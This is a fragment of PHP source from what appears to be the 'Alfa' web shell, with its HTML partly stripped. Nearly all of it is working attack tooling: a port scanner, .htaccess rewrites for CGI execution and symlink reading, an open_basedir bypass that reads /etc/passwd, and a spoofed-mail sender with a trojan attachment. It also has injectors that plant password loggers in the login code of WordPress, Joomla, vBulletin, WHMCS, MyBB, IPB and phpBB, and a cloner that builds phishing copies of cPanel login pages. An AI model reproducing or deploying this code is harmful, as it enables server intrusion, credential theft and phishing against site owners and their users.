1;\n$bin = \"\";\ndo{\n$line = fgets($sock, 1024);\nif(trim($line)==\"\")$counter++;\n$bin .= $line;\n}while($counter<$maxtry);\nfclose($sock);\necho \"
Port $i is open
\";\necho \"
\";\n}\nflush();\n}\n}\necho '
';\nalfafooter();\n}\nfunction alfacgihtaccess($m,$d='', $symname=false){\n$readme = \"\";\nif($symname){$readme=\"\\nReadmeName \".trim($symname);}\nif($m=='cgi'){\n$code = \"#Coded By Sole Sad & Invisible\\nOptions FollowSymLinks MultiViews Indexes ExecCGI\\nAddType application/x-httpd-cgi .alfa\\nAddHandler cgi-script .alfa\";\n}elseif($m=='sym'){\n$code = \"#Coded By Sole Sad & Invisible\\nOptions Indexes FollowSymLinks\\nDirectoryIndex solevisible.phtm\\nAddType text/plain php html php4 phtml\\nAddHandler text/plain php html php4 phtml{$readme}\\nOptions all\";\n}elseif($m=='shtml'){\n$code = \"Options +Includes\\nAddType text/html .shtml\\nAddHandler server-parsed .shtml\";\n}\n@__write_file($d . \".htaccess\", $code);\n}\nfunction alfabasedir(){\nalfahead();\necho '
\n
| Open Base Dir |
';\n$passwd = _alfa_file('/etc/passwd');\nif(is_array($passwd)){\n$users = array();\n$makepwd = alfaMakePwd();\n$basedir = @ini_get('open_basedir');\n$safe_mode = @ini_get('safe_mode');\nif(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){\n$bash = \"fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP\";\n$tmp_path = alfaWriteTocgiapi(\"basedir.alfa\",$bash);\n$bash_users  = alfaEx(\"cd \".$tmp_path.\"/alfacgiapi;sh basedir.alfa \".$makepwd,false,true,true);\n$users = json_decode($bash_users, true);\n$x=count($users);\nif($x>=2){array_pop($users);--$x;}\n}\nif(!$basedir&&!$safe_mode){\n$x=0;\nforeach($passwd as $str){\n$pos = strpos($str,':');\n$username = substr($str,0,$pos);\n$dirz = str_replace(\"{user}\", $username, $makepwd);\nif(($username != '')){\nif (@is_readable($dirz)){\narray_push($users,$username);\n$x++;\n}}}\n}\necho '

';\necho \"[+] Founded \".sizeof($passwd).\" entrys in /etc/passwd\\n\".\"
\";\necho \"[+] Founded \".$x.\" readable \".str_replace(\"{user}\", \"*\", $makepwd).\" directories\\n\".\"
\";\necho \"[~] Searching for passwords in config files...\\n\\n\".\"


\";\nforeach($users as $user){\nif(empty($user))continue;\n$path = str_replace(\"{user}\", $user, $makepwd);\necho \"
Change Dir ..:: $user ::..

\";\n}\n}else{echo(' 
[-] Error : coudn`t read /etc/passwd [-]
');}\necho '

';\necho '
';\nalfafooter();\n}\nfunction alfamail(){\nalfahead();\necho '
';\nAlfaNum(8,9,10);\necho '
| Fake Mail |
>\\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;\">';\n$table = array(\n'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => '[email protected]', 'inputSize' => '60','placeholder' => true),\n'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => '[email protected]', 'inputSize' => '60', 'placeholder' => true),\n'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),\n'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),\n'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')\n);\ncreate_table($table);\necho '
Message:
';\nif(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){\n$mail_to = $_POST['alfa1'];\n$mail_from = $_POST['alfa2'];\n$mail_subject = $_POST['alfa3'];\n$mail_content = $_POST['alfa5'];\n$count_mail = (int)$_POST['alfa6'];\n$mail_attach = $_POST['alfa7'];\nif(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){\nif(!empty($mail_attach)&&@is_file($mail_attach)){\n$file = $mail_attach;\n$content = __read_file($file);\n$content = chunk_split(__ZW5jb2Rlcg($content));\n$uid = md5(uniqid(time()));\n$filename = basename($file);\n$headers  = \"From: \".$mail_from.\" <\".$mail_from.\">\\r\\n\";\n$headers .= \"To: \" . $mail_to. \" ( \".$mail_to.\" ) \\r\\n\";\n$headers .= \"Reply-To: \".$mail_from.\"\\r\\n\";\n$headers .= \"Content-Type: multipart/mixed; boundary=\\\"\".$uid.\"\\\"\\r\\n\\r\\n\";\n$headers .= 'MIME-Version: 1.0' . \"\\r\\n\";\n$headers .= 'X-Mailer: php' . \"\\r\\n\";\n$mail_content  = \"--\".$uid.\"\\r\\n\";\n$mail_content .= \"Content-type:text/plain; charset=iso-8859-1\\r\\n\";\n$mail_content .= \"Content-Transfer-Encoding: 7bit\\r\\n\\r\\n\";\n$mail_content .= $mail_content.\"\\r\\n\\r\\n\";\n$mail_content .= \"--\".$uid.\"\\r\\n\";\n$mail_content .= \"Content-Type: application/octet-stream; name=\\\"\".$filename.\"\\\"\\r\\n\";\n$mail_content .= \"Content-Transfer-Encoding: base64\\r\\n\";\n$mail_content .= \"Content-Disposition: attachment; filename=\\\"\".$filename.\"\\\"\\r\\n\\r\\n\";\n$mail_content .= $content.\"\\r\\n\\r\\n\";\n$mail_content .= \"--\".$uid.\"--\";\n}else{\n$headers  = \"From: \" . $mail_from. \" ( \".$mail_from.\" ) \\r\\n\";\n$headers .= \"To: \" . $mail_to. \" ( \".$mail_to.\" ) \\r\\n\";\n$headers .= 'Reply-To: '.$mail_from.'' . \"\\r\\n\";\n$headers .= 'Content-type: text/html; charset=utf-8' . \"\\r\\n\";\n$headers .= 'MIME-Version: 1.0' . \"\\r\\n\";\n$headers .= 'X-Mailer: php' . \"\\r\\n\";\n}\nif(empty($count_mail)||$count_mail<1)$count_mail=1;\nif(!empty($mail_from)){echo __pre();\nfor($i=1;$i<=$count_mail;$i++){\nif(@mail($mail_to,$mail_subject,$mail_content,$headers))echo(\"
Sent -> $mail_to
\");\n}}else{__alert(\"Invalid Mail From !\");}\n}else{__alert(\"Invalid Mail To !\");}\n}\necho('
');\nalfafooter();\n}\nfunction alfaziper(){\nalfahead();\nAlfaNum(8,9,10);\necho '
| Compressor |
\n
>\\');return false;\" method=\"post\">\n
Dir/File: 
 \n
Save Dir: 
 \n\n
';\nif(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){\n$dirzip = $_POST['alfa3'];\n$zipfile = $_POST['alfa4'];\nif($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){\nalfaEx(\"powershell Compress-Archive -Path '\".addslashes($dirzip).\"' -DestinationPath '\".addslashes(basename($zipfile)).\"'\");\necho __pre().'
Done -> '.$zipfile.'
';\n}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){\nalfaEx(\"cd '\".addslashes(dirname($zipfile)).\"';zip -r '\".addslashes(basename($zipfile)).\"' '\".addslashes($dirzip).\"'\");\necho __pre().'
Done -> '.$zipfile.'
';\n}elseif(class_exists('ZipArchive')){\nif(__alfaziper($dirzip, $zipfile)){\necho __pre().'
Success...!
'.$zipfile.'
';\n}else{echo __pre().'
ERROR!!!...
';}\n}\n}\necho '
';\nalfafooter();\n}\nfunction __alfaziper($source,$destination){\n\tif(!extension_loaded('zip')||!file_exists($source)){\n\t\treturn false;\n\t}\n\t$zip=new ZipArchive();\n\tif(!$zip->open($destination,ZIPARCHIVE::CREATE)){\n\t\treturn false;\n\t}\n\t$source=str_replace('\\\\','/',realpath($source));\n\tif(is_dir($source)===true){\n\t\t$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);\n\t\tforeach($files as $file){\n\t\t\t$file=str_replace('\\\\','/',$file);\n\t\t\tif(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;\n\t\t\t$file=realpath($file);\n\t\t\tif(is_dir($file)===true){\n\t\t\t\t$zip->addEmptyDir(str_replace($source.'/','',$file.'/'));\n\t\t\t}else if(is_file($file)===true){\n\t\t\t\t$zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));\n\t\t\t}\n\t\t}\n\t}else if(is_file($source)===true){\n\t\t$zip->addFromString(basename($source),file_get_contents($source));\n\t}\n\treturn $zip->close();\n}\nfunction alfadeziper(){\nalfahead();\nAlfaNum(8,9,10);\necho '
| DeCompressor |
\n
>\\');return false;\" method=\"post\">\n
File: 
 \n
Extract To: 
 \n\n
';\nif(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){\n$dirzip = $_POST['alfa3'];\n$zipfile = $_POST['alfa4'];\nif(@!is_dir($zipfile)){\n\t@mkdir($zipfile, 0777, true);\n}\n$finfo = \"\";\n$file_type = \"\";\nif(function_exists('finfo_open')){\n$finfo = @finfo_open(FILEINFO_MIME_TYPE);\n$file_type = @finfo_file($finfo, $dirzip);\n@finfo_close($finfo);\n}else{\n\tif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){\n\t\t$file_type = alfaEx('file -b --mime-type ' . $dirzip);\n\t}\n}\nif($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){\nalfaEx(\"powershell expand-archive -path '\".addslashes($dirzip).\"' -destinationpath '\".addslashes(basename($zipfile)).\"'\");\necho __pre().'
Done -> '.$zipfile.'
';\n}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){\nswitch ($file_type) {\n\tcase 'application/zip':\n\t\talfaEx(\"cd '\".addslashes($zipfile).\"';unzip '\".addslashes($dirzip).\"'\");\n\tbreak;\n\tcase 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':\n\t\tif(strstr(basename($dirzip), \".tar.gz\")||strstr(basename($dirzip), \".tar\")){\n\t\t\talfaEx(\"cd '\".addslashes($zipfile).\"';tar xzf '\".addslashes($dirzip).\"'\");\n\t\t}else{\n\t\t\talfaEx(\"cd '\".addslashes($zipfile).\"';gunzip '\".addslashes($dirzip).\"'\");\n\t\t}\n\tbreak;\n}\necho __pre().'
Done -> '.$zipfile.' [ View Folder ]
';\n}elseif(class_exists('ZipArchive')){\n\t$itsok = false;\n\tif(emtpy($file_type)){\n\t\t$file_type = \"application/zip\";\n\t}\n\tswitch ($file_type) {\n\t\tcase 'application/zip':\n\t\t\t$zip = new ZipArchive;\n\t\t\t$res = $zip->open($dirzip);\n\t\t\tif ($res) {\n\t\t\t\t$zip->extractTo($zipfile);\n\t\t\t\t$zip->close();\n\t\t\t\t$itsok = true;\n\t\t\t}\n\t\tbreak;\n\t\tcase 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':\n\t\t\tif(strstr(basename($dirzip), \".tar.gz\")){\n\t\t\t\t$new_file = $zipfile .'/'. basename($dirzip);\n\t\t\t\t@copy($dirzip, $new_file);\n\t\t\t\t$new_tar = str_replace(\".tar.gz\", \".tar\", $new_file);\n\t\t\t\ttry {\n\t\t\t\t\t$p = new PharData($new_file);\n\t\t\t\t\t$p->decompress();\n\t\t\t\t\t$phar = new PharData($new_tar);\n\t\t\t\t\t$phar->extractTo($zipfile);\n\t\t\t\t\t@unlink($new_file);\n\t\t\t\t\t@unlink($new_tar);\n\t\t\t\t\t$itsok = true;\n\t\t\t\t} catch (Exception $e) {\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\ttry {\n\t\t\t\t\t$phar = new PharData($dirzip);\n\t\t\t\t\t$phar->extractTo($zipfile);\n\t\t\t\t\t$itsok = true;\n\t\t\t\t} catch (Exception $e) {\n\t\t\t\t}\n\t\t\t}\n\t\tbreak;\n\t}\nif($itsok){\necho __pre().'
Success...!
'.$zipfile.' [ View Folder ]
';\n}else{echo __pre().'
ERROR!!!...
';}\n}\n}\necho '
';\nalfafooter();\n}\nfunction alfacmshijacker(){\nalfahead();\nAlfaNum(5,6,7,8,9,10);\necho '

\n
| Cms Hijacker |


>\\',this.cmspath.value);return false;\" method=\\'post\\'>\n
CMS: \");\necho ' Path installed cms: \nSaveTo: \n

';\n$cms = $_POST['alfa1'];\n$saveto = $_POST['alfa2'];\n$cmspath = $_POST['alfa4'];\nif(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){\necho __pre();\nalfaHijackCms($cms,$cmspath,$saveto);\n}\necho '
';\nalfafooter();\n}\nfunction alfaHijackCms($cms,$cmspath,$saveto){\nswitch($cms){\ncase \"vb\":\nhijackvBulletin($cmspath,$saveto);\nbreak;\ncase \"wp\":\nhijackwp($cmspath,$saveto);\nbreak;\ncase \"jom\":\nhijackJoomla($cmspath,$saveto);\nbreak;\ncase \"whmcs\":\nhijackWhmcs($cmspath,$saveto);\nbreak;\ncase \"mybb\":\nhijackMybb($cmspath,$saveto);\nbreak;\ncase \"ipb\":\nhijackIPB($cmspath,$saveto);\nbreak;\ncase \"phpbb\":\nhijackPHPBB($cmspath,$saveto);\nbreak;\ndefault:\necho \"error!\";\nbreak;\n}\n}\nfunction hijackvBulletin($path,$saveto){\n$code='$alfa_username = strtolower($vbulletin->GPC[\"vb_login_username\"]);$alfa_password = $vbulletin->GPC[\"vb_login_password\"];$alfa_file = \"{saveto_path}\";$sql_query = $vbulletin->db->query_read(\"SELECT * FROM \" . TABLE_PREFIX . \"user WHERE `username`=\\'\" . $alfa_username . \"\\'\");while($row = $vbulletin->db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, \"a+\");@fwrite($fp1, $alfa_username . \\' : \\' .  $alfa_password.\" (\" . $row[\"email\"] . \")\\n\");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, \"w\");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';\n$clearpw = 'defined(\\'DISABLE_PASSWORD_CLEARING\\')';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$login = $path.\"/login.php\";\n$class = $path.\"/includes/class_bootstrap.php\";\n$dologin = 'do_login_redirect();';\n$evil_login = \"\\t\".$code.\"\\n\\t\".$dologin;\n$evil_class = \"true\";\nif((@is_file($login) AND @is_writable($login)) || (@is_file($class) AND @is_writable($class))){\n$data_login = @file_get_contents($login);\n$data_class = @file_get_contents($class);\nif(strstr($data_login, $dologin) || strstr($data_class, $clearpw)){\n$login_replace = str_replace($dologin,$evil_login, $data_login);\n$class_replace = str_replace($clearpw,$evil_class, $data_class);\n@file_put_contents($login, $login_replace);\n@file_put_contents($class, $class_replace);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackwp($path,$saveto){\n$code = '$alfa_file=\"{saveto_path}\";$fp = fopen($alfa_file, \"a+\");fwrite($fp, $_POST[\\'log\\'].\" : \".$_POST[\\'pwd\\'].\" (\".($user->user_email).\")\\n\");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, \"w\");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';\n$redirect_wp = '#if[ ]{0,}\\([ ]{0,}![ ]{0,}is_wp_error\\([ ]{0,}\\$user[ ]{0,}\\)[ ]{0,}&&[ ]{0,}![ ]{0,}\\$reauth[ ]{0,}\\)[ ]{0,}{#';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$login=$path.\"/wp-login.php\";\nif(@is_file($login) AND @is_writable($login)){\n$data_login = @file_get_contents($login);\nif(@preg_match($redirect_wp, $data_login, $match)){\n$evil_login = \"\\t\".$match[0].\"\\n\\t\".$code;\n$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);\n@file_put_contents($login, $login_replace);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackJoomla($path,$saveto){\n$code = '$_POST[\\'username\\'],\\'password\\'=>$_POST[\\'passwd\\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file=\"{saveto_path}\";$fp=@fopen($alfa_file,\"a+\");@fwrite($fp, $Alfa_response->username.\":\".$_POST[\\'passwd\\'].\" ( \".$Alfa_response->email.\" )\\n\");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, \"w\");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$comp=$path.\"/administrator/components/com_login/\";\nif(@is_file($comp.\"/login.php\")){\n$login = $comp.\"/login.php\";\n}elseif(@is_file($comp.\"/admin.login.php\")){\n$login = $comp.\"/admin.login.php\";\n}else{\n$login = '';\n}\nif(@is_file($login) AND @is_writable($login) AND $login != ''){\n$data_login = @file_get_contents($login);\n$evil_login = $code.\"\\n\".$data_login;\n@file_put_contents($login, $evil_login);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackWhmcs($path,$saveto){\n$code = ' 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\\':\\', $row[\\'password\\']);$__encPW = md5($__salt[1].$_POST[\\'password\\']).\\':\\'.$__salt[1];if($row[\\'password\\'] == $__encPW){$allow = true;$row[\\'username\\'] = $row[\\'email\\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, \"a+\");@fwrite($fp, $row[\\'username\\'] . \\' : \\' .  $alfa_pw.\" (\" . $row[\"email\"] . \") : \".($admin ? \\'is_admin\\' : \\'is_user\\').\"\\n\");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, \"w\");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$conf=$path.\"/configuration.php\";\nif(@is_file($conf) AND @is_writable($conf)){\n$data_conf = @file_get_contents($conf);\nif(!strstr($data_conf,'?>'))$code = '?>'.$code;\n$evil_conf = $data_conf.\"\\n\".$code;\n@file_put_contents($conf, $evil_conf);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackMybb($path,$saveto){\n$code = '$alfa_q = $db->query(\"SELECT `email` FROM \".TABLE_PREFIX.\"users WHERE `username` = \\'\".$user[\\'username\\'].\"\\'\");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = \"{saveto_path}\";$fp = @fopen($alfa_file, \"a+\");@fwrite($fp, $user[\\'username\\'].\" : \". $user[\\'password\\'].\" ( \".$alfa_fetch[\\'email\\'].\" )\\n\");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, \"w\");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';\n$find = '$loginhandler->complete_login();';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$login=$path.\"/member.php\";\n$evil_login = \"\\t\".$code.\"\\n\\t\".$find;\nif(@is_file($login) AND @is_writable($login)){\n$data_login = @file_get_contents($login);\nif(strstr($data_login, $find)){\n$login_replace = str_replace($find,$evil_login, $data_login);\n@file_put_contents($login, $login_replace);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackIPB($path,$saveto){\n$code = '$Alfa_q = $this->DB->buildAndFetch(array(\\'select\\' => \\'email\\', \\'from\\' => \\'members\\', \\'where\\' => \\'name=\"\\'.$username.\\'\" OR email=\"\\'.$email.\\'\"\\'));$Alfa_file = \"{saveto_path}\";$fp = @fopen($Alfa_file, \"a+\");@fwrite($fp, $_POST[\\'ips_username\\'].\\' : \\'.$_POST[\\'ips_password\\'].\\' ( \\'.$Alfa_q[\\'email\\'].\\' )\\'.\"\\n\");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, \"w\");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';\n$find = 'unset( $member[\\'plainPassword\\'] );';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$login=$path.\"/admin/sources/handlers/han_login.php\";\n$evil_login = \"\\t\".$find.\"\\n\\t\".$code;\nif(@is_file($login) AND @is_writable($login)){\n$data_login = @file_get_contents($login);\nif(strstr($data_login, $find)){\n$login_replace = str_replace($find,$evil_login, $data_login);\n@file_put_contents($login, $login_replace);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackPHPBB($path,$saveto){\n$code = '$Alfa_u = request_var(\\'username\\', \\'\\');$Alfa_p = request_var(\\'password\\', \\'\\');if($Alfa_u != \\'\\' AND $Alfa_p != \\'\\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\\'status\\'] == LOGIN_SUCCESS){$Alfa_file =\"{saveto_path}\";$fp = @fopen($Alfa_file, \"a+\");@fwrite($fp, $Alfa_u.\" : \".$Alfa_p. \" ( \".$Alfa_response[\\'user_row\\'][\\'user_email\\'].\" )\\n\");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, \"w\");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';\n$find = 'case \\'login\\':';\n$code=str_replace('{saveto_path}',$saveto,$code);\n$login=$path.\"/ucp.php\";\n$evil_login = \"\\t\".$find.\"\\n\\t\".$code;\nif(@is_file($login) AND @is_writable($login)){\n$data_login = @file_get_contents($login);\nif(strstr($data_login, $find)){\n$login_replace = str_replace($find,$evil_login, $data_login);\n@file_put_contents($login, $login_replace);\nhijackOutput(0,$saveto);\n}else{\nhijackOutput(1);\n}\n}else{\nhijackOutput(1);\n}\n}\nfunction hijackOutput($c=0,$p=''){echo($c==0?\"
Success --> path: $p
\":'
Error in inject code !
');}\nfunction Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){\nif(@is_dir($dir)){\n$files=@scandir($dir);\nforeach($files as $key => $value){\n$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);\nif(!@is_dir($path)){\nif($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}\nif($e=='str'){\n$content = @file_get_contents($path);\nif(strpos($content, $string) !== false){\necho str_replace('\\\\','/',$path) . \"
\";\n}\n}else{\nif(strstr($value,$string)){\necho str_replace('\\\\','/',$path) . \"
\";\n}\n}\n$results[] = $path;\n}elseif($value != \".\" && $value != \"..\") {\nAlfa_StrSearcher($path,$string,$ext,$e,$results);\n$results[] = $path;\n}}}}\nfunction alfafakepage(){\n\talfahead();\n\tAlfaNum(9,10);\n\techo '

\n\t
| Host Manager Fake page |


>\\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;\" method=\\'post\\'>\n\t
Panel: 
\");\n\techo '
Clone page: 
\n\t
Fake page root: 
\n\t
Inject to: 
\n\t
Bind on: 
\n\t
Log To: 
\n\t
Count of Invalid login: 
\n\t

';\n\t$clone_page = $_POST['alfa1'];\n\t$fake_root = $_POST['alfa2'];\n\t$logto = $_POST['alfa4'];\n\t$panel = $_POST['alfa5'];\n\t$inject_to = $_POST['alfa6'];\n\t$bind_on = $_POST['alfa7'];\n\t$count = $_POST['alfa8'];\n\tif(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){\n\t\techo __pre();\n\t\t$target = $clone_page;\n\t\t$curl = new AlfaCURL();\n\t\t$source_page = $curl->Send($target);\n\t\tif(!empty($source_page)){\n\t\t\t$matched_form = \"\";\n\t\t\tif($panel == \"cpanel\"){\n\t\t\t\tif(preg_match('##', $source_page, $match)){\n\t\t\t\t\t$matched_form = $match[0];\n\t\t\t\t}\n\t\t\t}else{\n\t\t\t\tif(preg_match('##', $source_page, $match)){\n\t\t\t\t\t$matched_form = $match[0];\n\t\t\t\t}\n\t\t\t}\n\t\t\tif(!empty($matched_form)){\n\t\t\t\t$fake = \"\";\n\t\t\t\t$pwd = str_replace($_SERVER[\"DOCUMENT_ROOT\"], '', $fake_root);\n\t\t\t\t$uri = str_replace($_SERVER[\"DOCUMENT_ROOT\"], '', $inject_to);\n\t\t\t\tif($panel == \"cpanel\"){\n\t\t\t\t\t$port = \"2083\";\n\t\t\t\t}else{\n\t\t\t\t\t$target = str_replace(array(\"http://\", \"https://\"), \"\", $target);\n\t\t\t\t\t$port = explode(\":\",$target);\n\t\t\t\t\t$port = $port[1];\n\t\t\t\t}\n\t\t\t\tif(substr($uri, 0, 1) == \"/\"){\n\t\t\t\t\t$uri = substr($uri, 1);\n\t\t\t\t}\n\t\t\t\t$uri = $_SERVER[\"HTTP_ORIGIN\"] . '/' . str_replace(\"index.php\", \"\", $uri) . '?:' . $port;\n\t\t\t\t$log_url = $_SERVER[\"HTTP_ORIGIN\"] . $pwd . '/log.php';\n\t\t\t\tif($panel == \"cpanel\"){\n\t\t\t\t\t$form = '
';\n\t\t\t\t}else{\n\t\t\t\t\t$form = '';\n\t\t\t\t}\n\t\t\t\t$fake = str_replace($matched_form, $form, $source_page);\n\t\t\t\tif(@!is_dir($fake_root)){\n\t\t\t\t\t@mkdir($fake_root, 0777, true);\n\t\t\t\t}\n\n\t\t\t\t$cookie_name = \"alfa_fakepage_counter\" . rand(9999,99999);\n\n\t\t\t\t$post_user = 'user';\n\t\t\t\t$post_pass = 'pass';\n\t\t\t\t$resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array(\"message\" => \"no_username\"));}else{http_response_code(401);}';\n\t\t\t\tif($panel != \"cpanel\"){\n\t\t\t\t\t$post_user = 'username';\n\t\t\t\t\t$post_pass = 'password';\n\t\t\t\t\t$resp_code = '@header(\"Location: \".$_SERVER[\\'HTTP_REFERER\\']);';\n\t\t\t\t}\n\n\t\t\t\t$cpanel_log = ''.$count.'){@header(\"Location: /\");exit;}@setcookie(\"'.$cookie_name.'\", ((int)$_COOKIE[\"'.$cookie_name.'\"] + 1), $cook_time, \"/\");$fp = @fopen(\"'.$logto.'\", \"a+\");@fwrite($fp, $user . \" : \" . $pass . \"\\n\");fclose($fp);sleep(3);'.$resp_code.'exit;}?>';\n\n\t\t\t\t@file_put_contents($fake_root.'/log.php', $cpanel_log);\n\n\t\t\t\tif($panel == \"cpanel\"){\n\t\t\t\t\t$fake = preg_replace(array('##', '##', '# #'), array('', '\"logo\"', ''), $fake);\n\t\t\t\t}\n\n\t\t\t\t@file_put_contents($fake_root.'/index.php', $fake);\n\n\t\t\t\t$inject_code = '';\n\t\t\t\t$bind_on_code = '';\n\n\t\t\t\t@file_put_contents($inject_to, $inject_code . \"\\n\" .@file_get_contents($inject_to));\n\t\t\t\t@file_put_contents($bind_on, $bind_on_code . \"\\n\" .@file_get_contents($bind_on));\n\n\t\t\t\techo \"success...!\";\n\t\t\t}else{\n\t\t\t\techo \"failed...!\";\n\t\t\t}\n\t\t}else{\n\t\t\techo(\"
Cannot open the target...!
\");\n\t\t}\n\t}\n\techo '
';\n\talfafooter();\n}\nfunction alfaarchive_manager(){\n\talfahead();\n\t$file = $_POST['alfa2'];\n\tif(!file_exists($file)){\n\t\t$file = $GLOBALS['cwd'];\n\t}\n\t$rand_id = rand(9999, 999999);\n\techo '
| Archive Manager |
';\n\techo '>\\');return false;\" method=\\'post\\'>\n\t
\n\tArchive file: \n\t

';\n\tif($_POST['alfa5']=='>>'){\n\t\t//echo __pre();\n\t\techo '
';\n\t\techo '
';\n\t\t__alfa_open_archive_file($file, $rand_id);\n\t\techo '
';\n\t}\n\techo '
';\n\talfafooter();\n}\nfunction __alfa_open_archive_file($arch, $base_id=0){\n\ttry{\n\t\t$files = array();\n\t\t$dirs = array();\n\t\t$archive = new PharData($arch);\n\t\t foreach($archive as $file) {\n\t\t\t $file_modify = @date('Y-m-d H:i:s', @filemtime($file->getPathname()));\n\t\t     if($file->isDir()) {\n\t\t\t\t $dirs[] = array(\"name\" => $file->getFileName(), \"path\" => $file->getPathname(), \"type\" => \"dir\", \"modify\" => $file_modify);\n\t\t     }else{\n\t\t\t\t $file_size = @filesize($file->getPathname());\n\t\t\t\t $files[] = array(\"name\" => $file->getFileName(), \"path\" => $file->getPathname(), \"type\" => \"file\",  \"modify\" => $file_modify, \"size\" => $file_size);\n\t\t\t }\n\t\t }\n\t\t function __alfa_open_archive_usort($a, $b){\n\t\t\t return strcmp(strtolower($a['name']), strtolower($b['name']))*1;\n\t\t }\n\t\t usort($dirs, \"__alfa_open_archive_usort\");\n\t\t usort($files, \"__alfa_open_archive_usort\");\n\t\t $files = array_merge($dirs, $files);\n\t\t echo '';\n\t\t $icon = '';\n\t\t echo '';\n\t\t foreach($files as $file){\n\t\t\t $icon = '';\n\t\t\t if($file[\"type\"] == \"dir\"){\n\t\t\t \techo '';\n\t\t \t}else{\n\t\t\t\techo \"\";\n\n\t\t\t}\n\t\t }\n\t\t  echo '
NameSizeModifyActions
'.$icon.'| .. |dir--
'.$icon.'| '.$file[\"name\"].' |dir'.$file[\"modify\"].'-
